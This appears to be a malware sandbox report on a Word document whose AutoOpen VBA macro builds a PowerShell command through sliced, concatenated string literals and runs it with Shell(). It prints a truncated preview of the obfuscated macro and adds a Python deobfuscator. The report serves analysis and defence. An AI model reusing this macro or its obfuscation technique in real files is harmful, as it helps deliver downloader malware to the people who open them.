Verdict: MALICIOUS
Risk Score: 142
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic

Malware Insights
The sample is a Microsoft Office (OLE) Word document whose VBA project contains an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled. The critical finding is a Shell() call in the VBA. The extracted macro's helper functions assemble strings at runtime by slicing string literals with Left(Right(...)) and joining the pieces with Chr(43) ("+"); the visible fragments (a literal containing "owershell ((", single-quote characters and the "+" separators) are consistent with a PowerShell one-liner that is itself built from concatenated string pieces. Taken together, an auto-executing macro that builds and shells out a PowerShell command points to a downloader or first-stage execution payload. Because the command string only exists after the macro runs, static review of the preview does not reveal the final PowerShell command line or its target; recovering it requires evaluating the string-building functions or observing the process tree in a sandbox. The legacy WordBasic auto-exec marker finding repeats the AutoOpen evidence: its generic description says no modern VBA project was recovered, but one was (macros.bas below), so it should not be counted as a separate execution surface.
Heuristics (5)

- VBA macros detected (medium, 2 related findings) - OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) - OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) - OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) - OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) - EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier that Office writes into its own markup, not a network indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 189234 bytes | f2c8649f950a54309d809be43b0001618e22b6fd51802a07a76314f08ca928f8 |
Script preview (first 1,000 lines of the extracted script; the listing below is cut off where the report truncates it)

```vb
Attribute VB_Name = "HPfiIqCZCzE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BiaZiUSTfbG()
On Error Resume Next
TjaXAFJScCO = (buuTYhNRjGq - CDbl(275438) + WAsTihMYIK + Fix(YriNONHvG / CLng(387668 * Sqr(JzmTWNYuBMN))) - 425551 / Sin(kBzNpnvqqp - KWbpUwE - 498046 + CLng(KkuMDFAH)) * 474213 * Fix(275438))
bvFFFjiwVi = "UbCpiVBE7Dyowershell (('Oa0zAJX7QkjtuVmYxSCkK8(HiogLC"
jtlZtRvtR = CStr(Left(Right(bvFFFjiwVi, 43), 14)) + CStr(Left(Right(bvFFFjiwVi, 7), 1)) + Left(Right(bvFFFjiwVi, 46), 2) + CStr(Left(Right(bvFFFjiwVi, 47), 1))
kjhIBGlRo = "7hQaLnsaYcEBvogd7gTCtIT1L4F'UDICk"
TvqRNIRwZvL = CStr(Left(Right(kjhIBGlRo, 31), 6)) + Left(Right(kjhIBGlRo, 18), 2) + CStr(Left(Right(kjhIBGlRo, 4), 1)) + CStr(Left(Right(kjhIBGlRo, 23), 1)) + Left(Right(kjhIBGlRo, 6), 1)
UHJaFoOmoju = Chr(43)
Sstvzw = "'Y8"
tfTwRkWtkz = CStr(Left(Right(Sstvzw, 3), 1))
KkBEYioVj = (ZSNWFVGcuL - CDbl(560944) + rYGOHG + Fix(jwZQNFnRmP / CLng(889142 * Sqr(MNDQV))) - 43562 / Sin(FYBYuL - LURSLupQb - 481550 + CLng(phQIE)) * 948300 * Fix(560944))
nnnmBYck = Chr(43)
sKQStT = "vgN7DEasd = grR7TCtIT1&(FUUDICkw1EpLPUSDPCzKBQrG"
kEUjSX = CStr(Left(Right(sKQStT, 45), 9)) + CStr(Left(Right(sKQStT, 26), 2)) + CStr(Left(Right(sKQStT, 6), 1)) + Left(Right(sKQStT, 34), 2) + CStr(Left(Right(sKQStT, 9), 1)) + CStr(Left(Right(sKQStT, 15), 1))
jEQEwnUco = Chr(43)
amkCmL = "Q7DE7nNE7OY7mBvogr0gTDtI"
VtdZjKkd = Left(Right(amkCmL, 23), 5) + Left(Right(amkCmL, 13), 1) + Left(Right(amkCmL, 3), 1) + Left(Right(amkCmL, 17), 1)
bzSKzaCjHh = (tjFPN - CDbl(274567) + RkmGDKt + Fix(ztQCdCHwv / CLng(382293 * Sqr(DqEQt))) - 574199 / Sin(OmvXBFap - iFoZiYpZ - 960787 + CLng(wjljdfwu)) * 888394 * Fix(274567))
jiRwnnzTVL = Chr(43)
HYDfIpw = "Q7DEzgEu77YcmBvogrDgT"
EQrXNEEk = Left(Right(HYDfIpw, 20), 4) + CStr(Left(Right(HYDfIpw, 12), 1)) + Left(Right(HYDfIpw, 3), 1) + Left(Right(HYDfIpw, 15), 1)
SpjspYksT = Chr(43)
jmNLnjCl = "7DEKQq'hvgNu"
OwjCv = Left(Right(jmNLnjCl, 12), 3) + Left(Right(jmNLnjCl, 6), 1)
tuYGPDGA = (zcVNwC - CDbl(714926) + sTwMZ + Fix(BdndXMVS / CLng(768947 * Sqr(JhfCak))) - 368832 / Sin(WkNsA - nhhQdtvmq - 865153 + CLng(wTtvTljtiv)) * 301862 * Fix(714926))
UqziScWEov = Chr(43)
UTRooJzKiDC = "H'R77hvDNu7OYEm"
MBYcK = Left(Right(UTRooJzKiDC, 14), 3) + CStr(Left(Right(UTRooJzKiDC, 8), 1)) + CStr(Left(Right(UTRooJzKiDC, 2), 1))
GTrOQ = Chr(43)
ZXobs = "7DEKQq7hvgNu"
wUCqiPVoKFI = Left(Right(ZXobs, 12), 3) + Left(Right(ZXobs, 6), 1)
PwcItovkKj = Chr(43)
COPvK = "7hzR7ezODcmBRogr0gTCtIE7L4F"
rQwmDjqBYE = Left(Right(COPvK, 25), 5) + Left(Right(COPvK, 15), 1) + Left(Right(COPvK, 4), 1) + Left(Right(COPvK, 19), 1) + Left(Right(COPvK, 5), 1)
BiaZiUSTfbG = jtlZtRvtR + TvqRNIRwZvL + UHJaFoOmoju + tfTwRkWtkz + nnnmBYck + kEUjSX + jEQEwnUco + VtdZjKkd + jiRwnnzTVL + EQrXNEEk + SpjspYksT + OwjCv + UqziScWEov + MBYcK + GTrOQ + wUCqiPVoKFI + PwcItovkKj + rQwmDjqBYE
End Function
Function wKPmnoSGpG()
On Error Resume Next
knYzS = (HAHRDujzklY - CDbl(574423) + iRzFYCjj + Fix(MELBw / CLng(953564 * Sqr(CHtoQLE))) - 492814 / Sin(DLNkUtM - zErZCGiOWN - 70674 + CLng(ovvvQFYjrq)) * 364235 * Fix(574423))
dTAXnczPjmR = Chr(43)
znDiRMSwC = "7DEKQq7hvgNu"
uoKlnvYDszm = Left(Right(znDiRMSwC, 12), 3) + Left(Right(znDiRMSwC, 6), 1)
QuAcmEDsbmw = Chr(43)
PVKiRzUIf = "HzR77hvDNu7OYEm"
HRiCa = Left(Right(PVKiRzUIf, 14), 3) + CStr(Left(Right(PVKiRzUIf, 8), 1)) + CStr(Left(Right(PVKiRzUIf, 2), 1))
RvLjJB = Chr(43)
zIJhYqFEVd = "Q7DE7gEu77YcmBvogrDgT"
jwVbJCjhAG = Left(Right(zIJhYqFEVd, 20), 4) + CStr(Left(Right(zIJhYqFEVd, 12), 1)) + Left(Right(zIJhYqFEVd, 3), 1) + Left(Right(zIJhYqFEVd, 15), 1)
cVdfiZRHqEi = Chr(43)
zXbVlOpaV = "vgN7DEw-objog70gTCtec1L4FUUDECkw1DpLPzS2PC"
RWchfrn = CStr(Left(Right(zXbVlOpaV, 39), 8)) + Left(Right(zXbVlOpaV, 23), 2) + Left(Right(zXbVlOpaV, 5), 1) + Left(Right(zXbVlOpaV, 29), 1) + CStr(
```
... (truncated)
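The string-building pattern in the preview (a literal, then Left(Right(literal, n), m) slices wrapped in CStr(), glued with "+" and Chr(43), with decoy arithmetic assignments in between) can be reduced statically without running the macro. The following Python is an added example written for this page, not code from the report, from oletools, or from the sample: it tokenizes each assignment in a Function body, evaluates the string operations with VBA's Left/Right semantics, skips anything it cannot resolve (the junk arithmetic fails on "-" and on undefined names), and returns the value assigned to the function's own name. The VBA text in SAMPLE is constructed in the same shape as the preview so the block runs offline; it is not text from the sample. To apply it to the real artifact, feed each Function body from macros.bas to reduce_function and look at the returned string.

```python
"""Reduce VBA string-assembly obfuscation: literals sliced with
Left(Right(s, n), m), wrapped in CStr(), joined with "+" and Chr(43).
Added example for this report page; SAMPLE below is constructed."""
import re

TOKEN_RE = re.compile(r'\s*(?:("(?:[^"]|"")*")|(\d+)|([A-Za-z_]\w*)|([(),+]))')
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
FUNC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?Function\s+(\w+)')


class Unresolved(Exception):
    """Expression uses arithmetic, an unsupported call or an undefined name
    (every decoy numeric assignment in the preview ends up here)."""


def tokenize(src):
    src, pos, toks = src.strip(), 0, []
    while pos < len(src):
        m = TOKEN_RE.match(src, pos)
        if not m:                      # e.g. "-", "*", "/" in the junk lines
            raise Unresolved("cannot tokenize %r" % src[pos:pos + 12])
        pos = m.end()
        lit, num, ident, punct = m.groups()
        if lit is not None:
            toks.append(("str", lit[1:-1].replace('""', '"')))
        elif num is not None:
            toks.append(("int", int(num)))
        elif ident is not None:
            toks.append(("id", ident))
        else:
            toks.append(("p", punct))
    return toks


class Evaluator:
    """Recursive-descent evaluator for: literal | name | Chr(n) | CStr(e) |
    Left(e, n) | Right(e, n) | e + e, using VBA slicing semantics."""

    def __init__(self, tokens, env):
        self.toks, self.pos, self.env = tokens, 0, env

    def peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else (None, None)

    def take(self, kind=None, value=None):
        tok = self.peek()
        if tok[0] is None or (kind and tok[0] != kind) or (value is not None and tok[1] != value):
            raise Unresolved("unexpected token %r" % (tok,))
        self.pos += 1
        return tok[1]

    def run(self):
        value = self.expr()
        if self.pos != len(self.toks):
            raise Unresolved("trailing tokens")
        return value

    def expr(self):
        value = self.term()
        while self.peek() == ("p", "+"):   # "+" on two VBA strings concatenates
            self.take()
            value += self.term()
        return value

    def term(self):
        kind, value = self.peek()
        if kind == "str":
            return self.take()
        if kind == "id":
            self.take()
            if self.peek() == ("p", "("):
                return self.call(value.lower())
            if value in self.env:
                return self.env[value]
            raise Unresolved("undefined name " + value)
        raise Unresolved("bad term %r" % (value,))

    def call(self, name):
        self.take("p", "(")
        if name == "chr":
            code = self.take("int")
            self.take("p", ")")
            return chr(code)
        if name == "cstr":
            value = self.expr()
            self.take("p", ")")
            return value
        if name in ("left", "right"):
            s = self.expr()
            self.take("p", ",")
            n = self.take("int")
            self.take("p", ")")
            if name == "left":
                return s[:n]                # Left(s, n): first n chars (all if n > Len)
            return s[-n:] if n else ""      # Right(s, n): last n chars
        raise Unresolved("unsupported call " + name)


def reduce_function(vba_source):
    """Evaluate every resolvable assignment in one Function body; return
    (value assigned to the function's own name, all resolved variables)."""
    env, func_name, result = {}, None, None
    for line in vba_source.splitlines():
        m = FUNC_RE.match(line)
        if m:
            func_name = m.group(1)
            continue
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        try:
            env[name] = Evaluator(tokenize(rhs), env).run()
        except Unresolved:
            continue                        # junk arithmetic: skip, keep env clean
        if name == func_name:
            result = env[name]
    return result, env


# Constructed VBA in the shape of the preview (decoy arithmetic, sliced
# literals, Chr(43) separators); not text taken from the sample.
SAMPLE = '''Function BuildCmd()
On Error Resume Next
junk = (abc - CDbl(275438) + xyz * Fix(275438))
s1 = "Zpowershell ('Y"
p1 = CStr(Left(Right(s1, 14), 13))
s2 = "ab-nopcd"
p2 = Left(Right(s2, 6), 4)
q = "'Q"
p3 = CStr(Left(Right(q, 2), 1))
sep = Chr(43)
s3 = "QQ'-w hidden')zz"
p4 = Left(Right(s3, 14), 12)
BuildCmd = p1 + p2 + p3 + sep + p4
End Function
'''

if __name__ == "__main__":
    value, resolved = reduce_function(SAMPLE)
    print(value)   # powershell ('-nop'+'-w hidden')
```

The reducer deliberately refuses anything it does not understand instead of guessing, so a function whose result depends on a Replace(), Mid() or StrReverse() call (none appear in the visible preview, but later bodies may use them) comes back as None rather than as a wrong string; extend Evaluator.call for each additional builtin you meet. Note that the first chunk in the preview, Left(Right(bvFFFjiwVi, 43), 14), reduces to a string beginning "yowershell", so expect the recovered command to need one more transformation or a different function to be the one actually passed to Shell(); a sandbox process tree remains the authoritative check.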